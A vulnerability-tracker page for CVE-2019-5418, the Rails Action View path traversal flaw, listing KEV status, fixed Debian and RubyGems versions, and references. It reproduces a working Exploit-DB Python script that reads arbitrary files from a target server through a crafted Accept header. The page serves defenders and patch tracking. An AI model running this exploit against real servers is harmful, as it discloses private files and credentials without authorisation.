CVE-2019-5418
unknown
KEV
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
2.5
Description
Rails Ruby on Rails contains a path traversal vulnerability in Action View. Specially crafted accept headers in combination with calls to `render file:` can cause arbitrary files on the target server to be rendered, disclosing the file contents.
CISA KEV
- Vendor
- Rails
- Product
- Ruby on Rails
- Due date
- 2025-07-28
Predictions
Exploit likelihood
99%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Rails 5.2.1 - Arbitrary File Content Disclosure
'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys
try:
import requests
except ImportError:
print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
sys.exit(1)
def banner():
banner = """
----------------------------------------------
Arbitrary Traversal exploit for Ruby on Rails
CVE-2019-5418
----------------------------------------------
"""
print(banner)
def check_args():
if len(sys.argv) != 2:
print("Invalid number of arguments entered!")
how_to_use = "python3 Bandit.py url"
print('Use as:', how_to_use)
sys.exit(1)
def check_url(url):
status_code = requests.get(url)
if status_code != 200:
print("Url is invalid or can not be reached!")
sys.exit(1)
def read_file(url, file):
headers = {'Accept': file + '{{'}
req = requests.get(url, headers=headers)
return req
def main():
banner()
check_args()
url = sys.argv[1]
while True:
try:
file = input("Enter file to read (enter quit to exit): ")
except Exception:
file = raw_input("Enter file to read (enter quit to exit): ")
try:
if file.lower() == 'quit':
break
except Exception:
if file == 'quit':
break
response = read_file(url, file)
print(response.text)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Affected | โ |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2:5.2.2.1+dfsg-1 |
| sid | Fixed | 2:5.2.2.1+dfsg-1 |
| forky | Fixed | 2:5.2.2.1+dfsg-1 |
| bullseye | Fixed | 2:5.2.2.1+dfsg-1 |
| bookworm | Fixed | 2:5.2.2.1+dfsg-1 |
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| RubyGems | actionview | <~> 4.2.11, >= 4.2.11.1 | ~> 4.2.11, >= 4.2.11.1 |
| RubyGems | actionview | >=5.2.0,<5.2.2.1 | 5.2.2.1 |
| RubyGems | actionview | >=4.0.0,<4.2.11.1 | 4.2.11.1 |
| RubyGems | actionview | >=5.1.0,<5.1.6.2 | 5.1.6.2 |
| RubyGems | actionview | >=5.0.0,<5.0.7.2 | 5.0.7.2 |
References
- https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q
- https://www.suse.com/security/cve/CVE-2019-5418.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-5418
- https://access.redhat.com/errata/RHSA-2019:0796
- https://access.redhat.com/errata/RHSA-2019:1147
- https://access.redhat.com/errata/RHSA-2019:1149
- https://access.redhat.com/errata/RHSA-2019:1289
- https://groups.google.com/forum/#!topic/rubyonrails-security/zRNVOUhKHrg
- https://groups.google.com/forum/#%21topic/rubyonrails-security/pFRKI96Sm8Q
- https://lists.debian.org/debian-lts-announce/2019/03/msg00042.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y43636TH4D6T46IC6N2RQVJTRFJAAYGA
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y43636TH4D6T46IC6N2RQVJTRFJAAYGA
- https://web.archive.org/web/20190313201629/https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released
- https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-5418
- https://www.exploit-db.com/exploits/46585
- http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
- http://packetstormsecurity.com/files/152178/Rails-5.2.1-Arbitrary-File-Content-Disclosure.html
- http://www.openwall.com/lists/oss-security/2019/03/22/1
- https://security-tracker.debian.org/tracker/CVE-2019-5418
- https://web.archive.org/web/20190313201629/https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2019-5418
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.